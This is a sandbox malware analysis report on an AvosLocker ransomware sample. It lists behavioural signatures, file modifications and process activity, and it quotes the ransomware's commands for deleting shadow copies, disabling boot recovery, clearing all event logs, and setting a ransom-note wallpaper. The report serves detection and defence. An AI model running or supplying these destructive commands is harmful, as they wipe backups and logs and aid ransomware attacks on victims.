Malware Analysis Report

2024-10-16 03:27

Sample ID 240909-knhhxssdma
Target AvosLocker.exe
SHA256 f8e99bbacc62b0f72aa12f5f92e35607fa0382a881fe4a4b9476fc6b87a03c78
Tags
avoslocker defense_evasion discovery evasion execution impact ransomware
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

f8e99bbacc62b0f72aa12f5f92e35607fa0382a881fe4a4b9476fc6b87a03c78

Threat Level: Known bad

The file AvosLocker.exe was found to be: Known bad.

Malicious Activity Summary

avoslocker defense_evasion discovery evasion execution impact ransomware

Avoslocker Ransomware

Renames multiple (8494) files with added filename extension

Modifies boot configuration data using bcdedit

Renames multiple (10421) files with added filename extension

Deletes shadow copies

Enumerates connected drives

Drops desktop.ini file(s)

Sets desktop wallpaper using registry

Drops file in Program Files directory

Command and Scripting Interpreter: PowerShell

System Location Discovery: System Language Discovery

Unsigned PE

Suspicious use of WriteProcessMemory

Suspicious behavior: EnumeratesProcesses

Uses Volume Shadow Copy service COM API

Interacts with shadow copies

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2024-09-09 08:44

Signatures

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A

Analysis: behavioral1

Detonation Overview

Submitted

2024-09-09 08:44

Reported

2024-09-09 08:47

Platform

win7-20240729-en

Max time kernel

28s

Max time network

16s

Command Line

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

Signatures

Avoslocker Ransomware

ransomware avoslocker

Deletes shadow copies

ransomware defense_evasion impact execution

Modifies boot configuration data using bcdedit

ransomware evasion
Description Indicator Process Target
N/A N/A C:\Windows\system32\bcdedit.exe N/A
N/A N/A C:\Windows\system32\bcdedit.exe N/A

Renames multiple (10421) files with added filename extension

ransomware

Drops desktop.ini file(s)

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\1033\DataServices\DESKTOP.INI C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Enumerates connected drives

Description Indicator Process Target
File opened (read-only) \??\Z: C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Sets desktop wallpaper using registry

ransomware
Description Indicator Process Target
Set value (str) \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Control Panel\Desktop\Wallpaper = "C:\\Users\\Admin\\AppData\\Local\\Temp\\1751524172.png" C:\Windows\system32\reg.exe N/A

Drops file in Program Files directory

Description Indicator Process Target
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Currency.Gadget\it-IT\js\currency.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Bibliography\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Recife C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.components.ui.zh_CN_5.5.0.165303.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolBMPs\TipsImageMask.bmp C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH02897J.JPG C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\TypeSupport\Unicode\Mappings\Mac\ICELAND.TXT C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Reference Assemblies\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Hearts\de-DE\Hearts.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\include\win32\bridge\AccessBridgeCallbacks.h C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\sl-SI\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0341328.JPG C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\PH01247U.BMP C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\LanguageNames2\DisplayLanguageNames.en_CA.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Currency.Gadget\fr-FR\css\currency.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\Calendar\CalendarViewButtonImages.jpg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\Pacific\Marquesas C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Asia\Dhaka C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Microsoft Games\Multiplayer\Checkers\fr-FR\chkrzm.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\zi\America\Santarem C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\images\45.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\Certificates\Verisign\Components\VeriSign_Class_3_Public_Primary_CA.cer C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Media Player\fr-FR\WMPDMC.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Windows Defender\it-IT\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Common Files\Microsoft Shared\ink\ar-SA\tipresx.dll.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jre7\lib\fonts\LucidaTypewriterBold.ttf C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\modules\locale\org-netbeans-modules-keyring_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.equinox.console_1.1.0.v20140131-1639.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\jfr\profile.jfc C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Clock.Gadget\images\square_settings.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\modules\locale\com-sun-tools-visualvm-jvm_ja.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\VideoWall\videowall.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\OutlookAutoDiscover\PRODIGY.NET.XML C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\rtf_underline.gif C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0278702.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\PicturePuzzle.Gadget\it-IT\js\settings.js C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\gimap.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files (x86)\Microsoft Office\Office14\Groove\ToolData\groove.net\GrooveForms4\FormsStyles\BabyBlue\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\MEDIA\OFFICE14\BULLETS\BD15022_.GIF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\HH00084_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\NA01470_.WMF C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Windows Sidebar\Gadgets\Weather.Gadget\it-IT\css\weather.css C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\WORDREP.XML C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Reader 9.0\Resource\Linguistics\Providers\Proximity\11.00\can03.ths C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Media Player\es-ES\wmplayer.exe.mui C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\FlipPage\NavigationUp_ButtonGraphic.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0099161.JPG C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\profiler\modules\locale\org-netbeans-modules-profiler-selector-api_zh_CN.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\org.eclipse.ui.intro.nl_ja_4.4.0.v20140623020002.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\jre\lib\zi\Africa\Johannesburg C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\config\ModuleAutoDeps\org-openide-explorer.xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\db\lib\derbyLocale_hu.jar C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\DVD Maker\Shared\DvdStyles\LayeredTitles\NavigationLeft_SelectionSubpicture.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\SKY\SKY.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\44.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Windows Sidebar\Gadgets\Weather.Gadget\images\undocked_black_moon-new_partly-cloudy.png C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\platform\update_tracking\org-openide-util-lookup.xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\VideoLAN\VLC\locale\da\LC_MESSAGES\vlc.mo C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File created C:\Program Files\Microsoft Games\FreeCell\ja-JP\GET_YOUR_FILES_BACK.txt C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\visualvm\visualvm\update_tracking\com-sun-tools-visualvm-coredump.xml C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files\Java\jdk1.7.0_80\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\schema\com.jrockit.mc.rjmx.actionProvider.exsd C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\Office14\PUBWIZ\BS4BOXES.POC C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Microsoft Office\CLIPART\PUB60COR\J0175428.JPG C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
File opened for modification C:\Program Files (x86)\Common Files\microsoft shared\THEMES14\ECHO\ECHO.ELM C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Command and Scripting Interpreter: PowerShell

execution
Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\system32\vssadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeTakeOwnershipPrivilege N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\WMIC.exe N/A
Token: SeAuditPrivilege N/A C:\Windows\system32\vssvc.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 1456 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2704 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2448 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 1556 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 3008 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 1456 wrote to memory of 2804 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\system32\cmd.exe
PID 3008 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3008 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 3008 wrote to memory of 572 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2448 wrote to memory of 3040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2448 wrote to memory of 3040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2448 wrote to memory of 3040 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\vssadmin.exe
PID 2704 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2704 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 2704 wrote to memory of 1492 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\Wbem\WMIC.exe
PID 1556 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1556 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 1556 wrote to memory of 868 N/A C:\Windows\system32\cmd.exe C:\Windows\system32\bcdedit.exe
PID 2804 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 2804 wrote to memory of 1804 N/A C:\Windows\system32\cmd.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 1456 wrote to memory of 3484 N/A C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
PID 3484 wrote to memory of 3236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 3236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 3236 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\reg.exe
PID 3484 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 3484 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe
PID 3484 wrote to memory of 4084 N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe C:\Windows\system32\rundll32.exe

Uses Volume Shadow Copy service COM API

ransomware

Processes

C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe

"C:\Users\Admin\AppData\Local\Temp\AvosLocker.exe"

C:\Windows\system32\cmd.exe

cmd /c wmic shadowcopy delete /nointeractive

C:\Windows\system32\cmd.exe

cmd /c vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} recoveryenabled No

C:\Windows\system32\cmd.exe

cmd /c bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\system32\cmd.exe

cmd /c powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} bootstatuspolicy ignoreallfailures

C:\Windows\System32\Wbem\WMIC.exe

wmic shadowcopy delete /nointeractive

C:\Windows\system32\bcdedit.exe

bcdedit /set {default} recoveryenabled No

C:\Windows\system32\vssadmin.exe

vssadmin.exe Delete Shadows /All /Quiet

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -command "Get-EventLog -LogName * | ForEach { Clear-EventLog $_.Log }"

C:\Windows\system32\vssvc.exe

C:\Windows\system32\vssvc.exe

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

powershell -Command "$a = [System.IO.File]::ReadAllText(\"C:\GET_YOUR_FILES_BACK.txt\");Add-Type -AssemblyName System.Drawing;$filename = \"$env:temp\$(Get-Random).png\";$bmp = new-object System.Drawing.Bitmap 1920,1080;$font = new-object System.Drawing.Font Consolas,10;$brushBg = [System.Drawing.Brushes]::Black;$brushFg = [System.Drawing.Brushes]::White;$format = [System.Drawing.StringFormat]::GenericDefault;$format.Alignment = [System.Drawing.StringAlignment]::Center;$format.LineAlignment = [System.Drawing.StringAlignment]::Center;$graphics = [System.Drawing.Graphics]::FromImage($bmp);$graphics.FillRectangle($brushBg,0,0,$bmp.Width,$bmp.Height);$graphics.DrawString($a,$font,$brushFg,[System.Drawing.RectangleF]::FromLTRB(0, 0, 1920, 1080),$format);$graphics.Dispose();$bmp.Save($filename);reg add \"HKEY_CURRENT_USER\Control Panel\Desktop\" /v Wallpaper /t REG_SZ /d $filename /f;Start-Sleep 1;rundll32.exe user32.dll, UpdatePerUserSystemParameters, 0, $false;"

C:\Windows\system32\reg.exe

"C:\Windows\system32\reg.exe" add "HKEY_CURRENT_USER\Control Panel\Desktop" /v Wallpaper /t REG_SZ /d C:\Users\Admin\AppData\Local\Temp\1751524172.png /f

C:\Windows\system32\rundll32.exe

"C:\Windows\system32\rundll32.exe" user32.dll UpdatePerUserSystemParameters 0 False

Network

N/A

Files

C:\GET_YOUR_FILES_BACK.txt

MD5 01188d22b1675e3437b1418e14f4ffab
SHA1 6e7127f3bbfce49485ed8f1acf8f697bcb952818
SHA256 e4b3ac00a0b2eb195b26abffbc4368077384e73393e51605edda17dae05ab7f2
SHA512 6903ae3247f32ad79c60a2062cd6a7bdbf5a7c9db1bdc43bdbef4da3396945014d30968ea4c8531a2d0c7b695f1ea36e2b8c51bb39cc6157c4096ac04a6e187d

memory/1804-733-0x000000001B760000-0x000000001BA42000-memory.dmp

memory/1804-771-0x00000000004D0000-0x00000000004D8000-memory.dmp

